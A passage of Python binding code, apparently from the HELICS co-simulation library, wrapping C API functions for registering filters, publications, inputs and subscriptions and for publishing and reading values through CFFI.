f = loadSym("helicsFederateRegisterCloningFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsFederateRegisterGlobalCloningFilter(fed: HelicsFederate, name: str) -> HelicsCloningFilter:
"""
Create a global cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`fed`** - The federate to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterGlobalCloningFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsCoreRegisterFilter(core: HelicsCore, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a source Filter on the specified core.
Filters can be created through a federate or a core.handle, linking through a federate allows a few extra features of name matching to function on the federate interface but otherwise equivalent behavior.
**Parameters**
- **`core`** - The core to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsCoreRegisterFilter")
err = helicsErrorInitialize()
result = f(core.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsCoreRegisterCloningFilter(core: HelicsCore, name: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified core.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`core`** - The core to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsCoreRegisterCloningFilter")
err = helicsErrorInitialize()
result = f(core.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsFederateGetFilterCount(fed: HelicsFederate) -> int:
"""
Get the number of filters registered through a federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the filter.
**Returns**: A count of the number of filters registered through a federate.
"""
f = loadSym("helicsFederateGetFilterCount")
result = f(fed.handle)
return result
def helicsFederateGetFilter(fed: HelicsFederate, name: str) -> HelicsFilter:
"""
Get a filter by its name, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the filter.
- **`name`** - The name of the filter.
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateGetFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFederateGetFilterByIndex(fed: HelicsFederate, index: int) -> HelicsFilter:
"""
Get a filter by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`index`** - The index of the publication to get.
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateGetFilterByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFilterIsValid(filter: HelicsFilter) -> bool:
"""
Check if a filter is valid.
**Parameters**
- **`filter`** - The filter object to check.
**Returns**: `True` if the Filter object represents a valid filter.
"""
f = loadSym("helicsFilterIsValid")
result = f(filter.handle)
return result == 1
def helicsFilterGetName(filter: HelicsFilter) -> str:
"""
Get the name of the filter and store in the given string.
**Parameters**
- **`filter`** - The given filter.
**Returns**: A string with the name of the filter.
"""
f = loadSym("helicsFilterGetName")
result = f(filter.handle)
return ffi.string(result).decode()
def helicsFilterSet(filter: HelicsFilter, property: str, value: float):
"""
Set a property on a filter.
**Parameters**
- **`filter`** - The filter to modify.
- **`property`** - A string containing the property to set.
- **`value`** - A numerical value for the property.
"""
f = loadSym("helicsFilterSet")
err = helicsErrorInitialize()
f(filter.handle, cstring(property), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterSetString(filter: HelicsFilter, property: str, value: str):
"""
Set a string property on a filter.
**Parameters**
- **`filter`** - The filter to modify.
- **`property`** - A string containing the property to set.
- **`value`** - A string containing the new value.
"""
f = loadSym("helicsFilterSetString")
err = helicsErrorInitialize()
f(filter.handle, cstring(property), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddDestinationTarget(filter: HelicsFilter, destination: str):
"""
Add a destination target to a filter.
All messages going to a destination are copied to the delivery address(es).
**Parameters**
- **`filter`** - The given filter to add a destination target to.
- **`destination`** - The name of the endpoint to add as a destination target.
"""
f = loadSym("helicsFilterAddDestinationTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddSourceTarget(filter: HelicsFilter, source_name: str):
"""
Add a source target to a filter.
All messages coming from a source are copied to the delivery address(es).
**Parameters**
- **`filter`** - The given filter.
- **`source_name`** - The name of the endpoint to add as a source target.
"""
f = loadSym("helicsFilterAddSourceTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(source_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddDeliveryEndpoint(filter: HelicsFilter, delivery_endpoint: str):
"""
Clone filter functions.
Functions that manipulate cloning filters in some way.
Add a delivery endpoint to a cloning filter.
All cloned messages are sent to the delivery address(es).
**Parameters**
- **`filter`** - The given filter.
- **`delivery_endpoint`** - The name of the endpoint to deliver messages to.
"""
f = loadSym("helicsFilterAddDeliveryEndpoint")
err = helicsErrorInitialize()
f(filter.handle, cstring(delivery_endpoint), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterRemoveTarget(filter: HelicsFilter, target_name: str):
"""
Remove a destination target from a filter.
**Parameters**
- **`filter`** - The given filter.
- **`target_name`** - The named endpoint to remove as a target.
"""
f = loadSym("helicsFilterRemoveTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterRemoveDeliveryEndpoint(filter: HelicsFilter, delivery_endpoint: str):
"""
Remove a delivery destination from a cloning filter.
**Parameters**
- **`filter`** - The given filter (must be a cloning filter).
- **`delivery_endpoint`** - A string with the delivery endpoint to remove.
"""
f = loadSym("helicsFilterRemoveDeliveryEndpoint")
err = helicsErrorInitialize()
f(filter.handle, cstring(delivery_endpoint), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterGetInfo(filter: HelicsFilter) -> str:
"""
Get the data in the info field of a filter.
**Parameters**
- **`filter`** - The given filter.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsFilterGetInfo")
result = f(filter.handle)
return ffi.string(result).decode()
def helicsFilterSetInfo(filter: HelicsFilter, info: str):
"""
Set the data in the info field for a filter
**Parameters**
- **`filter`** - The given filter.
- **`info`** - The string to set.
"""
f = loadSym("helicsFilterSetInfo")
err = helicsErrorInitialize()
f(filter.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterSetOption(filter: HelicsFilter, option: HelicsHandleOption, value: int):
"""
Set the data in the info field for a filter.
**Parameters**
- **`filter`** - The given filter.
- **`option`** - The option to set `helics.HelicsHandleOption`.
- **`value`** - The value of the option commonly 0 for false 1 for true.
"""
f = loadSym("helicsFilterSetOption")
err = helicsErrorInitialize()
f(filter.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterGetOption(filter: Union[HelicsFilter], option: HelicsHandleOption) -> int:
"""
Get a handle option for the filter.
**Parameters**
- **`filter`** - The given filter to query.
- **`option`** - The option to query `helics.HelicsHandleOption`.
**Returns**: `int`.
"""
f = loadSym("helicsFilterGetOption")
result = f(filter.handle, HelicsHandleOption(option))
return result
def helicsFederateRegisterSubscription(fed: HelicsFederate, name: str, units: str = "") -> HelicsInput:
"""
Functions related to value federates for the C api.
Create a subscription.
The subscription becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a subscription, must have been created with `helics.helicsCreateValueFederate` or
`helics.helicsCreateCombinationFederate`.
- **`name`** - The identifier matching a publication to get a subscription for.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsSubscription`.
"""
f = loadSym("helicsFederateRegisterSubscription")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterPublication(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsPublication:
"""
Register a publication with a known type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication the global publication name will be prepended with the federate name.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterTypePublication(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsPublication:
"""
Register a publication with a defined type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A string labeling the type of the publication.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterTypePublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterGlobalPublication(fed: HelicsFederate, name: str, type: HelicsDataType, units: str = "") -> HelicsPublication:
"""
Register a global named publication with an arbitrary type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterGlobalTypePublication(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsPublication:
"""
Register a global publication with a defined type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A string describing the expected type of the publication.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalTypePublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterInput(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsInput:
"""
Register a named input.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free
functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the publication the global input name will be prepended with the federate name.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the input (optional).
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateRegisterInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterTypeInput(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsInput:
"""
Register an input with a defined type.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free
functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the input.
- **`type`** - A string describing the expected type of the input.
- **`units`** - A string listing the units of the input maybe NULL.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterTypeInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterGlobalInput(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsPublication:
"""
Register a global named input.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the subscription maybe NULL.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterGlobalTypeInput(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsInput:
"""
Register a global publication with an arbitrary type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A string defining the type of the input.
- **`units`** - A string listing the units of the subscription maybe NULL.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalTypeInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetPublication(fed: HelicsFederate, name: str) -> HelicsPublication:
"""
Get a `helics.HelicsPublication` from a name.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the publication.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateGetPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateGetPublicationByIndex(fed: HelicsFederate, index: int) -> HelicsPublication:
"""
Get a publication by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`index`** - The index of the publication to get.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateGetPublicationByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateGetInput(fed: HelicsFederate, name: str) -> HelicsInput:
"""
Get an input object from a name.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the input.
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateGetInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetInputByIndex(fed: HelicsFederate, index: int) -> HelicsInput:
"""
Get an input by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`index`** - The index of the publication to get.
**Returns**: `helics.HelicsInput`
"""
f = loadSym("helicsFederateGetInputByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetSubscription(fed: HelicsFederate, name: str) -> HelicsInput:
"""
Get an input object from a subscription target.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the publication that a subscription is targeting.
**Returns**: `helics.HelicsInput`
"""
f = loadSym("helicsFederateGetSubscription")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateClearUpdates(fed: HelicsFederate):
"""
Clear all the update flags from a federates inputs.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` for which to clear update flags.
"""
f = loadSym("helicsFederateClearUpdates")
f(fed.handle)
def helicsFederateRegisterFromPublicationJSON(fed: HelicsFederate, json: str):
"""
Register the publications via JSON publication string.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to register the publications.
- **`json`** - The JSON publication string.
"""
f = loadSym("helicsFederateRegisterFromPublicationJSON")
err = helicsErrorInitialize()
f(fed.handle, cstring(json), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederatePublishJSON(fed: HelicsFederate, json: str):
"""
Publish data contained in a JSON file or string.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` through which to publish the data.
- **`json`** - The publication file name or literal JSON data string.
"""
f = loadSym("helicsFederatePublishJSON")
err = helicsErrorInitialize()
f(fed.handle, cstring(json), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationIsValid(pub: HelicsPublication) -> bool:
"""
Publication functions.
Functions for publishing data of various kinds.
The data will get translated to the type specified when the publication was constructed automatically regardless of the function used to publish the data.
Check if a publication is valid.
**Parameters**
- **`pub`** - The publication to check
**Returns**: `True` if the publication is a valid publication.
"""
f = loadSym("helicsPublicationIsValid")
result = f(pub.handle)
return result == 1
def helicsPublicationPublishRaw(pub: HelicsPublication, data: bytes):
"""
Publish raw data from a char * and length.
**Parameters**
- **`pub`** - The publication to publish for.
- **`data`** - A pointer to the raw data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsPublicationPublishBytes` instead.")
helicsPublicationPublishBytes(pub, data)
def helicsPublicationPublishBytes(pub: HelicsPublication, data: bytes):
"""
Publish raw data from a char * and length.
**Parameters**
- **`pub`** - The publication to publish for.
- **`data`** - A pointer to the raw data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsPublicationPublishRaw")
else:
f = loadSym("helicsPublicationPublishBytes")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(pub.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishString(pub: HelicsPublication, string: str):
"""
Publish a string.
**Parameters**
- **`pub`** - The publication to publish for.
- **`string`** - The string to publish.
"""
f = loadSym("helicsPublicationPublishString")
err = helicsErrorInitialize()
f(pub.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishInteger(pub: HelicsPublication, value: int):
"""
Publish an integer value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishInteger")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishBoolean(pub: HelicsPublication, value: bool):
"""
Publish a Boolean Value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The boolean value to publish.
"""
f = loadSym("helicsPublicationPublishBoolean")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishDouble(pub: HelicsPublication, value: float):
"""
Publish a double floating point value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishDouble")
err = helicsErrorInitialize()
f(pub.handle, cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishTime(pub: HelicsPublication, value: HelicsTime):
"""
Publish a time value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishTime")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishChar(pub: HelicsPublication, value: str):
"""
Publish a single character.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishChar")
err = helicsErrorInitialize()
f(pub.handle, cchar(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishComplex(pub: HelicsPublication, real: float, imag: float = 0):
"""
Publish a complex value (or pair of values).
**Parameters**
- **`pub`** - The publication to publish for.
- **`real`** - `float` number or `complex` number
- **`imag`** - `float` number
"""
c = complex(real, imag)
f = loadSym("helicsPublicationPublishComplex")
err = helicsErrorInitialize()
f(pub.handle, c.real, c.imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishVector(pub: HelicsPublication, vectorInput: List[float]):
"""
Publish a vector of doubles.
**Parameters**
- **`pub`** - The publication to publish for.
- **`vectorInput`** - A pointer to an array of double data.
"""
f = loadSym("helicsPublicationPublishVector")
err = helicsErrorInitialize()
vectorLength = len(vectorInput)
f(pub.handle, vectorInput, vectorLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishNamedPoint(pub: HelicsPublication, string: str, value: float):
"""
Publish a named point.
**Parameters**
- **`pub`** - The publication to publish for.
- **`string`** - A string for the name to publish.
- **`value`** - A double for the value to publish.
"""
f = loadSym("helicsPublicationPublishNamedPoint")
err = helicsErrorInitialize()
f(pub.handle, cstring(string), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationAddTarget(pub: HelicsPublication, target_name: str):
"""
Add a named input to the list of targets a publication publishes to.
**Parameters**
- **`pub`** - The publication to add the target for.
- **`target_name`** - The name of an input that the data should be sent to.
"""
f = loadSym("helicsPublicationAddTarget")
err = helicsErrorInitialize()
f(pub.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputIsValid(ipt: HelicsInput) -> bool:
"""
Check if an input is valid.
**Parameters**
- **`ipt`** - The input to check
**Returns**: `True` if the Input object represents a valid input.
"""
f = loadSym("helicsInputIsValid")
result = f(ipt.handle)
return result == 1
def helicsInputAddTarget(ipt: HelicsInput, target_name: str):
"""
Add a publication to the list of data that an input subscribes to.
**Parameters**
- **`ipt`** - The named input to modify.
- **`target_name`** - The name of a publication that an input should subscribe to.
"""
f = loadSym("helicsInputAddTarget")
err = helicsErrorInitialize()
f(ipt.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputGetRawValueSize(ipt: HelicsInput) -> int:
"""
Data can be returned in a number of formats, for instance if data is published as a double it can be returned as a string and vice versa, not all translations make that much sense but they do work.
Get the size of the raw value for subscription.
**Returns**: The size of the raw data/string in bytes.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsInputGetByteCount` instead.")
return helicsInputGetByteCount(ipt)
def helicsInputGetByteCount(ipt: HelicsInput) -> int:
"""
Data can be returned in a number of formats, for instance if data is published as a double it can be returned as a string and vice versa, not all translations make that much sense but they do work.
Get the size of the raw value for subscription.
**Returns**: The size of the raw data/string in bytes.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetRawValueSize")
else:
f = loadSym("helicsInputGetByteCount")
result = f(ipt.handle)
return result
def helicsInputGetRawValue(ipt: HelicsInput) -> bytes:
"""
Get the raw data for the latest value of a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: Raw string data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsInputGetBytes` instead.")
return helicsInputGetBytes(ipt)
def helicsInputGetBytes(ipt: HelicsInput) -> bytes:
"""
Get the raw data for the latest value of a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: Raw string data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetRawValue")
else:
f = loadSym("helicsInputGetBytes")
err = helicsErrorInitialize()
maxDataLen = helicsInputGetByteCount(ipt) + 1024
data = ffi.new("char[{maxDataLen}]".format(maxDataLen=maxDataLen))
actualSize = ffi.new("int[1]")
f(ipt.handle, data, maxDataLen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.unpack(data, length=actualSize[0])
def helicsInputGetStringSize(ipt: HelicsInput) -> int:
"""
Get the size of a value for subscription assuming return as a string.
**Returns**: The size of the string.
"""
f = loadSym("helicsInputGetStringSize")
result = f(ipt.handle)
return result
def helicsInputGetString(ipt: HelicsInput) -> str:
"""
Get a string value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: A string data
"""
f = loadSym("helicsInputGetString")
err = helicsErrorInitialize()
maxStringLen = helicsInputGetStringSize(ipt) + 1024
outputString = ffi.new("char[{maxStringLen}]".format(maxStringLen=maxStringLen))
actualLength = ffi.new("int[1]")
f(ipt.handle, outputString, maxStringLen, actualLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(outputString, maxlen=actualLength[0]).decode()
def helicsInputGetInteger(ipt: HelicsInput) -> int:
"""
Get an integer value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: An int64_t value with the current value of the input.
"""
f = loadSym("helicsInputGetInteger")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetBoolean(ipt: HelicsInput) -> bool:
"""
Get a boolean value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: A boolean value of current input value.
"""
f = loadSym("helicsInputGetBoolean")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsInputGetDouble(ipt: HelicsInput) -> float:
"""
Get a double value from a subscription..
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The double value of the input.
"""
f = loadSym("helicsInputGetDouble")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetTime(ipt: HelicsInput) -> HelicsTime:
"""
Get a time value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The resulting time value.
"""
f = loadSym("helicsInputGetTime")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetChar(ipt: HelicsInput) -> str:
"""
Get a single character value from an input.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The resulting character value.
"""
f = loadSym("helicsInputGetChar")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
# TODO: this is a char, will ffi.string conversion work?
return result.decode()
def helicsInputGetComplexObject(ipt: HelicsInput) -> Tuple[float, float]:
"""
Get a complex object from an input object.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: `complex`.
"""
